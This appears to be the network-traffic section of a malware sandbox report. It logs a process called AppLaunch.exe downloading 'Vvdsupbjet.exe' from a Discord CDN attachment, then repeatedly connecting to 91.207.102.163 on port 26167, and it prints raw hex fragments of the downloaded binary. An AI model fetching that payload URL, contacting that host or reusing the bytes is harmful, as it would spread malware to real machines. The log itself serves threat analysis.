                                                                          Sep 19, 2023 09:21:51.035526037 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.035681009 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.037091017 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.037131071 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.037158966 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.037166119 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.037184000 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.037204981 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.038289070 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.038331985 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.038357019 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.038363934 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.038526058 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.040133953 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.040177107 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.040215969 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.040221930 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.040249109 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.040265083 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.041804075 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.041879892 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.042495012 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.042557955 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.043559074 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.043575048 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.043613911 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.043618917 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.043641090 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.043658972 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.072258949 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.072273970 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.072351933 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.072357893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.072607040 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.115575075 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115602970 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115659952 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.115664959 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115677118 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115763903 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.116014957 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.117609978 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:22:09.932579994 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:22:10.027798891 CEST8049728162.159.135.233192.168.2.4
                                                                          Sep 19, 2023 09:22:10.027952909 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:22:37.009490013 CEST4974226167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:37.241612911 CEST261674974291.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:37.744193077 CEST4974226167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:37.976795912 CEST261674974291.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:38.478666067 CEST4974226167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:38.725979090 CEST261674974291.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:43.902307034 CEST4974326167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:44.135832071 CEST261674974391.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:44.650326967 CEST4974326167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:44.882632017 CEST261674974391.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:45.384659052 CEST4974326167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:45.621221066 CEST261674974391.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:50.635395050 CEST4974526167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:50.868858099 CEST261674974591.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:51.384639025 CEST4974526167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:51.617410898 CEST261674974591.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:52.118999958 CEST4974526167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:52.350366116 CEST261674974591.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:57.355782986 CEST4974626167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:57.592747927 CEST261674974691.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:58.103336096 CEST4974626167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:58.336198092 CEST261674974691.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:58.837760925 CEST4974626167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:59.071944952 CEST261674974691.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:23:04.088247061 CEST4974726167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:23:04.320441008 CEST261674974791.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:23:04.822021961 CEST4974726167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:23:05.053781986 CEST261674974791.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:23:05.556384087 CEST4974726167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:23:05.788189888 CEST261674974791.207.102.163192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 19, 2023 09:21:49.959867954 CEST | 64522 | 53 | 192.168.2.4 | 8.8.8.8
Sep 19, 2023 09:21:50.058835030 CEST | 53 | 64522 | 8.8.8.8 | 192.168.2.4
Sep 19, 2023 09:21:50.282275915 CEST | 53653 | 53 | 192.168.2.4 | 8.8.8.8
Sep 19, 2023 09:21:50.383383989 CEST | 53 | 53653 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 19, 2023 09:21:49.959867954 CEST | 192.168.2.4 | 8.8.8.8 | 0x9d3c | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
Sep 19, 2023 09:21:50.282275915 CEST | 192.168.2.4 | 8.8.8.8 | 0xbb41 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
                                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                          Sep 19, 2023 09:21:50.058835030 CEST | 8.8.8.8 | 192.168.2.4 | 0x9d3c | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST | 8.8.8.8 | 192.168.2.4 | 0x9d3c | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST | 8.8.8.8 | 192.168.2.4 | 0x9d3c | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST | 8.8.8.8 | 192.168.2.4 | 0x9d3c | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST | 8.8.8.8 | 192.168.2.4 | 0x9d3c | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST | 8.8.8.8 | 192.168.2.4 | 0xbb41 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST | 8.8.8.8 | 192.168.2.4 | 0xbb41 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST | 8.8.8.8 | 192.168.2.4 | 0xbb41 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST | 8.8.8.8 | 192.168.2.4 | 0xbb41 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001) | false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST | 8.8.8.8 | 192.168.2.4 | 0xbb41 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001) | false
                                                                          • cdn.discordapp.com
                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          0 | 192.168.2.4 | 49729 | 162.159.133.233 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          Timestamp | kBytes transferred | Direction | Data


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          1 | 192.168.2.4 | 49728 | 162.159.135.233 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 19, 2023 09:21:50.166960001 CEST | 550 | OUT | GET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                          Host: cdn.discordapp.com
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2023 09:21:50.267458916 CEST | 559 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Tue, 19 Sep 2023 07:21:50 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Tue, 19 Sep 2023 08:21:50 GMT
                                                                          Location: https://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                          Set-Cookie: __cf_bm=_5mG6bEZAsIeLteYk3.8Jt5w.5KXuOdmMwmWuI6HywA-1695108110-0-AZjiK3LAiPpnzako259F4D3G7h2mprEFaRjJk4/yRZ3aNrSo+oLubbDlQ0TK1jXiRXvgBvF3RIyhHMNedNYuuDE=; path=/; expires=Tue, 19-Sep-23 07:51:50 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q38lILdTjuTmBjy3TnzZmprjU3APfHGzEThrXYn1b%2FesBCj29F%2BeO5zAZw1Nrh0F4Ag2JNGt9w7WcJDVxZpuMe1Xw66EcVQwtDuV0VA%2B6rqP3Bgq3GUTlkBcDVRSfcnQGmukVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 809012f8b9198c1d-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          0 | 192.168.2.4 | 49729 | 162.159.133.233 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          2023-09-19 07:21:50 UTC | 0 | OUT | GET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                          Host: cdn.discordapp.com
                                                                          Connection: Keep-Alive
                                                                          2023-09-19 07:21:50 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 19 Sep 2023 07:21:50 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 363008
                                                                          Connection: close
                                                                          CF-Ray: 809012fc39de4297-EWR
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Age: 49634
                                                                          Cache-Control: public, max-age=31536000
                                                                          Content-Disposition: attachment; filename="Vvdsupbjet.exe"
                                                                          ETag: "5ca8de5b7c87d36341f0578a03615aee"
                                                                          Expires: Wed, 18 Sep 2024 07:21:50 GMT
                                                                          Last-Modified: Mon, 18 Sep 2023 04:48:46 GMT
                                                                          Vary: Accept-Encoding
                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                          x-goog-generation: 1695012526172444
                                                                          x-goog-hash: crc32c=0GJROA==
                                                                          x-goog-hash: md5=XKjeW3yH02NB8FeKA2Fa7g==
                                                                          x-goog-metageneration: 1
                                                                          x-goog-storage-class: STANDARD
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 363008
                                                                          X-GUploader-UploadID: ADPycduhLZDKx3Qhh_uQjnlh2PZ1LYFC9YYOuRiAvpCR6ZV3WKWwXRROHFATpkHK6zun6q5TwG3URarDiBhLV6ZeheeINpAe9wN7
                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                          Set-Cookie: __cf_bm=UkBafX0.MiYL.C5dXQv64aU3YYRgPNg1J8jjg70NcMw-1695108110-0-AR+vXXFVIH5eUM0yEbeW2pzc+wO/JYvlXE45LtLB9TN16igpvW6yNc8BJHL33S6OfNihz6tt6PvNRowy860XiqY=; path=/; expires=Tue, 19-Sep-23 07:51:50 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                          2023-09-19 07:21:50 UTC29INData Raw: 67 e9 1a 61 12 87 09 91 b5 63 de 89 5b 9a 95 da a3 47 b1 5b 20 33 85 26 db ed 06 f5 0f 4b 94 44 73 39 0f a6 3d e7 ce 71 28 8f de 01 9b 25 ff 4c 14 25 1d 5f 85 88 ae d4 55 ac 47 40 56 40 1b 0f 7f c6 ef 48 ac b3 ce e4 a0 1b ef 57 c5 cf c8 5e bb 51 10 0e 9e f7 e6 9f f8 05 df 6e 4c 92 93 63 2f 84 a3 3e 89 3f c6 fd b7 0b 31 ae 10 ca 7c 99 81 1c 1b d6 3c 58 4e fb 2d a4 c0 54 2c 9e 44 c2 b8 91 a8 85 af c7 99 5f a4 ba 06 3e 46 ef c3 be 11 6d b9 ef 5a 0a 7c aa 53 e3 2b 8c 68 32 7b f0 0b 52 67 65 22 a1 67 bd f1 22 c9 20 11 80 2c 20 29 ff c0 20 90 9b ee 29 d8 d9 64 71 2b c5 96 ce 37 91 50 02 78 c3 44 bf 9a 71 e9 9f e4 e7 ae 13 8f c3 b0 94 68 ef b3 58 9d 14 d8 f5 5a 08 2a 78 bc 63 c2 7f 2d b5 cf 19 23 1f a5 14 ed e0 1c b4 c7 ed c4 8d c9 13 12 6d 9b e7 e9 50 86 cf fc
                                                                          Data Ascii: gac[G[ 3&KDs9=q(%L%_UG@V@HW^QnLc/>?1|<XN-T,D_>FmZ|S+h2{Rge"g" , ) )dq+7PxDqhXZ*xc-#mP
                                                                          2023-09-19 07:21:50 UTC31INData Raw: 62 9c 17 72 8a f2 ad 06 32 8b 68 6e 6a 1c de 08 ae 50 94 68 6b 9d 98 5f d4 a3 3e f4 f7 23 38 66 f7 47 92 4e d8 f2 99 ae 48 d0 70 7b 7f 47 78 75 9f 86 56 e3 25 2f 21 e2 1c 67 06 b4 b0 36 04 e6 4d 79 a3 46 3b 35 df d5 6d df ef 3f c6 16 43 de f5 47 be f7 b6 2f b6 7b f9 f3 d9 93 cd a3 1e 9f 58 24 34 45 56 73 74 2e 07 ea c8 7f 53 87 54 ad 9a 91 77 50 e1 32 40 f6 bc 3d b5 9d 32 c4 c1 06 c9 8c aa 2a c0 b9 1d 78 75 d1 93 62 b0 a7 b4 23 73 79 01 19 de 89 6f 1a 85 83 49 74 09 1a 9f 2e 2d e5 a1 9b 3f 59 a3 7f d3 6d 84 79 61 c3 e5 09 10 f1 b5 9d cb 7e 91 d7 e8 b5 e8 c2 f1 ab 0e 72 9e 1f 5f e7 4a 73 06 c7 af e7 2e 6d b8 89 93 92 ec c0 8c d4 92 e8 7e 09 4e a9 70 01 e9 09 78 fc 1b ff 68 be 55 fe 5a 14 8a 88 85 4e e4 e6 d2 e7 88 76 dc 04 6f 32 50 26 26 54 ab 86 d4 e2 95
                                                                          Data Ascii: br2hnjPhk_>#8fGNHp{GxuV%/!g6MyF;5m?CG/{X$4EVst.STwP2@=2*xub#syoIt.-?Ymya~r_Js.m~NpxhUZNvo2P&&T
                                                                          2023-09-19 07:21:50 UTC32INData Raw: 78 b5 03 58 83 20 e3 3e 7a a7 6b 8d f7 99 98 b9 cd e4 92 ba c1 7a cd 62 9a 43 41 91 e4 57 7a e9 d5 33 9a 1f 5f 8d f6 82 bc 90 61 8a b0 ba 75 5b 09 45 55 65 f2 95 c1 8a e3 71 6f c0 b1 8a bb 8d 48 e0 87 3c 22 fe 79 3a 94 aa 8b f9 8a ec 0f c7 fd 87 95 1b 06 3a d5 d3 08 fd 8c 1b ae f7 5c 35 65 43 21 93 55 fc 46 46 ae ff 22 37 20 09 42 ef 10 e8 cd 9f 6d cd 28 00 57 1e cc a7 f4 5f 0c e5 de d1 02 20 a1 e9 d4 92 5f 0e b1 fd 72 25 f1 82 68 80 f1 87 14 c3 0c d7 f5 fa bb 8c 24 18 14 2b 50 da f7 a2 bf 1f 03 7f 0c 33 2d 01 ce 90 8f f8 cc 09 cd 32 8a 30 4b a0 f4 57 2e 8a d3 70 04 e3 0b 63 62 d3 ef c9 1d 08 2f 1c 4b 13 08 0c 20 ba c0 cc 6d 48 ed ed 02 f4 f8 3f f0 b6 00 20 a6 3d 17 06 20 7f a7 77 ad 9a 13 08 7a 53 e0 fd 25 93 7e 29 b2 ac 33 3e 7f c5 7b a2 5d 40 e1 74 91
                                                                          Data Ascii: xX >zkzbCAWz3_au[EUeqoH<"y::\5eC!UFF"7 Bm(W_ _r%h$+P3-20KW.pcb/K mH? = wzS%~)3>{]@t
                                                                          2023-09-19 07:21:50 UTC33INData Raw: 8f c6 ab fe 96 b3 d1 ac 4e 6c 3f b5 b5 c0 fa 15 10 42 13 3d 13 eb 3d 29 e8 6c d1 21 a4 0e c8 66 8a ff 95 55 81 f6 e6 15 fd e2 22 4f eb f4 36 c8 2f 61 2a 76 aa d6 73 bd b0 6e f9 c3 68 3b e5 42 31 13 ae 8b a0 c1 a2 62 f9 eb 14 65 f4 97 c4 68 b3 f8 92 aa 62 15 e6 29 f7 aa 28 1f 64 87 86 6c 84 5b 7d 10 9b cb 79 da 85 c5 8a 3f a4 73 1d 66 a7 f9 b9 68 fe f8 fa 01 78 c7 b1 3d a0 33 3a af 44 ab 6d aa 2e 5a fb ab 3c fd f8 ea 76 64 ac ea f7 57 2e ed 27 db 70 a2 15 df 9b 74 cf 26 30 37 bc 2b e6 f7 d5 13 e0 6e c2 b3 d5 3d 5a a3 1a 9d c5 36 3d 8d 83 8e d4 3a 24 5b c1 36 3d e3 5f c9 48 b4 6e 08 13 26 e4 65 30 90 24 c9 a9 66 66 30 da 86 b5 de 45 73 7f 96 30 7e 82 48 ce 7c f1 08 20 b5 8e 7c 01 3f 9f 8f 5b 32 5c 91 9b b2 fe d4 e7 fb a7 26 89 8e f3 c4 4a 9e bd 37 d6 22 94
                                                                          Data Ascii: Nl?B==)l!fU"O6/a*vsnh;B1behb)(dl[}y?sfhx=3:Dm.Z<vdW.'pt&07+n=Z6=:$[6=_Hn&e0$ff0Es0~H| |?[2\&J7"
                                                                          2023-09-19 07:21:50 UTC35INData Raw: d7 71 d4 b5 08 8b f7 1b 3e 8e e1 16 4f cc 57 67 39 c7 68 8c 2b b1 87 45 e7 d4 80 b8 f2 1b eb 69 39 49 a8 e6 ef 91 79 b1 7e ac 92 68 b3 cf 7b 89 4c 62 9d 41 99 05 69 7c 97 64 eb 0a f9 a6 f2 a8 a5 17 64 3c 60 9d 08 d5 79 93 ee 4b a7 33 af a6 de a1 31 8d eb 1c 8b 2c 36 b5 f8 56 93 17 4f 14 ea e3 cc 12 3f 63 ae 1b 2d e4 f6 47 a9 e8 e5 bf 18 3f 29 f9 35 ef 19 43 53 78 de f1 95 52 07 ff cc 80 ee a3 0c 49 a6 48 95 99 f4 2f 2e aa b9 76 06 75 90 1c 90 3f 3e 4c ef bd ea b5 85 64 2c fd 37 31 b1 a1 cf 6d e5 6e 34 7b c8 43 c5 77 3c b8 20 5a d0 ec 1b a4 f4 53 ac 8d e3 d8 5c d5 e8 f1 ea 92 9e cd d5 de 25 75 b0 1f 84 31 6c 85 af 5d 8e ae ca 0e 5a 46 a3 8b ea f0 3d 20 a1 a3 13 fe 7e 20 e6 fe 26 8a 61 15 b4 7b eb 93 8e 14 b2 be 71 9a dc a6 64 7d 7b 17 a2 0f 78 1e e1 69 51
                                                                          Data Ascii: q>OWg9h+Ei9Iy~h{LbAi|dd<`yK31,6VO?c-G?)5CSxRIH/.vu?>Ld,71mn4{Cw< ZS\%u1l]ZF= ~ &a{qd}{xiQ
                                                                          2023-09-19 07:21:50 UTC36INData Raw: a9 25 0e 4a 9b 5a 94 09 06 36 bd 28 0d 53 4e 72 59 36 8b 08 ba 1d c2 59 bd 4c 12 ab 3c 38 9f ab 4d 95 8b d6 e5 0d 7d a9 51 e8 8a cd c8 ab ef b1 da fc 3d 2a f6 2b 78 0e c7 68 ff 54 54 2a 70 cd 3f 97 74 b8 3e ff 33 0d 3a 35 df e0 75 e8 84 8e 0b fe c4 d4 22 aa b6 99 af 98 05 d7 a9 6a 60 ab 44 04 fd 97 c1 6b 70 e2 c6 b2 b6 94 b6 95 b9 2b 14 39 88 b4 fd 1b fe 2f 16 c6 32 60 6b 07 6c b1 45 b4 83 5f 08 86 0d 62 91 2f 7c 2b 78 c0 b1 39 8f 73 1e 66 2a 1f 55 f7 c1 46 0d 4d c2 b2 bc e1 1b d1 a3 39 a7 0e 98 fe 04 1c 71 20 2f f8 f2 f0 89 ac 16 09 90 15 0b 18 5d 46 11 56 73 cd 87 3e b1 1a aa 6a fd cf e9 6e bb 35 1c 51 82 ca db 68 d4 e8 f2 c4 bc 78 0e 60 f0 fc 9b 5f 31 fe 1f ec 6f ae 56 f1 43 9b b0 bd 0c 7f da 5a b3 27 e7 38 54 7c 40 2b 92 07 b6 71 97 36 d2 3e e1 ff 55
                                                                          Data Ascii: %JZ6(SNrY6YL<8M}Q=*+xhTT*p?t>3:5u"j`Dkp+9/2`klE_b/|+x9sf*UFM9q /]FVs>jn5Qhx`_1oVCZ'8T|@+q6>U
                                                                          2023-09-19 07:21:50 UTC37INData Raw: b3 e7 1d 63 6c 5e 2d 2b 90 11 42 7e 6c f4 f4 af 72 67 e1 f4 7f 75 c2 9c 9a 43 6d f5 f5 97 d5 d8 30 b8 3d 38 ab 8f 99 85 7a d9 50 de 57 bb 5a 58 d9 06 16 5c 1f fb f4 54 88 62 1f ad 1e 6d 72 02 c5 c2 ef 28 eb 57 0f a3 99 dd c2 e3 96 3f ef fc 33 6b f8 3f 1a 8e 43 5d 57 25 93 3a af eb f6 b5 ae 2f f2 12 92 b9 ca 21 0b 76 3e 78 22 25 80 87 b9 e7 4a b2 3a 43 af 0e 9b 4d f1 31 09 c9 f8 4f bc c5 d8 97 f7 da f3 a4 03 6d 11 d9 bd 1d 2c c2 51 65 26 9b bb 9e a7 64 8a ab cb 23 84 21 86 e0 c5 08 07 cc f3 9c ab 43 4d 7b 1f 90 0e ae 9c e2 71 82 08 c4 60 f0 03 18 f6 59 66 89 f7 35 7b 57 a6 e7 20 60 bb b2 f8 99 83 18 28 ef 98 e9 90 3b 4e 67 3d d5 7f 47 f9 bb 8b 12 f0 55 28 3f 38 a7 53 59 9e a3 f0 28 5b 87 df c9 69 48 06 2c 8e 8b 5f 9b 7f 79 ab 82 b1 e0 6d 61 4c 5a be c5 b5
                                                                          Data Ascii: cl^-+B~lrguCm0=8zPWZX\Tbmr(W?3k?C]W%:/!v>x"%J:CM1Om,Qe&d#!CM{q`Yf5{W `(;Ng=GU(?8SY([iH,_ymaLZ
                                                                          2023-09-19 07:21:50 UTC39INData Raw: 82 c2 f1 18 4a 76 32 71 a4 60 85 bd e9 33 db 8c 6f 0f 28 3c fa a5 db 30 e4 68 53 ed d0 37 cf 8b 6a f8 0c 8b cc c4 00 c8 67 e1 09 d1 5b c1 a9 ab 74 b0 50 d1 7d 9e e1 11 d4 bb 63 83 81 8e 6d 44 bb 08 c2 10 c3 5f 41 d0 65 ca b7 39 6b 27 df 9b e4 5f 2d 33 88 ef da 84 f7 87 0a f5 51 6a 3b c1 31 83 d2 85 bb 10 f1 dd 61 76 3e 6d 4e 60 99 d0 1c 11 54 cf 94 c0 04 eb c3 91 58 ea 04 ec 1c 4d 8b 86 bf a7 09 ae 78 5e 09 0e 9d ad 80 ce 4a c5 02 ef 2f 6c 36 10 3a cc 82 04 24 97 06 ce f7 ac 1e 76 a3 bd 54 b6 d8 2d 2b b8 9b dd 73 f7 89 51 29 44 8b b6 f0 46 89 01 60 80 cc db 57 57 1c e5 df 6d 5f cb be ae 98 0d f9 6d 94 31 4e 19 0e ad bb 77 30 fd ae 1d 7b 02 ac 8c 40 ff d7 af 0b 59 7b 0a 8c 17 73 62 f6 05 e3 f0 b0 a0 27 07 f4 49 c8 df 0c b8 3f e2 84 1d 6f af c5 50 c1 56 4d
                                                                          Data Ascii: Jv2q`3o(<0hS7jg[tP}cmD_Ae9k'_-3Qj;1av>mN`TXMx^J/l6:$vT-+sQ)DF`WWm_m1Nw0{@Y{sb'I?oPVM
                                                                          2023-09-19 07:21:50 UTC40INData Raw: 6e 13 61 fd 0c e5 2b 10 51 e2 05 2e 1c 36 c1 00 13 d4 49 2d 34 fd 78 f9 4e a0 9c 9d d7 6a db 86 7c 89 47 51 6e b2 f5 72 be 99 52 fd 9f b9 13 7f 50 d2 e0 73 ca 77 a6 35 82 7f 16 6a 3f 2c f0 55 79 a6 ea c1 3f 8c 6d 83 80 bb 6b 7a a2 6d ec c1 13 b2 a1 78 20 ce ca 95 14 7c b1 f6 f9 f1 88 e9 0c 02 54 d5 6d fa 53 fb b6 9f b2 41 ef 56 aa 39 12 d1 06 ef 23 7b ab c5 42 5b a8 bd ab f4 b8 f8 f0 4e dd 99 94 20 33 94 79 d4 26 a1 00 61 07 7a f7 da 56 be 01 3f fb d8 b2 d0 58 a6 81 c9 bd 91 69 4a 02 3e 02 1e f4 9a 2d 99 22 27 e1 62 4d 3e ec d9 3b 0f 37 47 d9 67 12 17 0c 0d bd 57 f5 79 01 38 02 f7 54 07 a7 30 5a 5d 6e 5f be 19 c9 a0 2f 88 21 46 bf 59 97 26 bf 2d 7e f8 33 54 63 cb 7b e6 31 a4 04 b2 22 db 57 52 08 77 11 d1 bc 9b 84 1d ab ca 8f 5b 0c 34 bc b5 a7 ab e6 5f 67
                                                                          Data Ascii: na+Q.6I-4xNj|GQnrRPsw5j?,Uy?mkzmx |TmSAV9#{B[N 3y&azV?XiJ>-"'bM>;7GgWy8T0Z]n_/!FY&-~3Tc{1"WRw[4_g
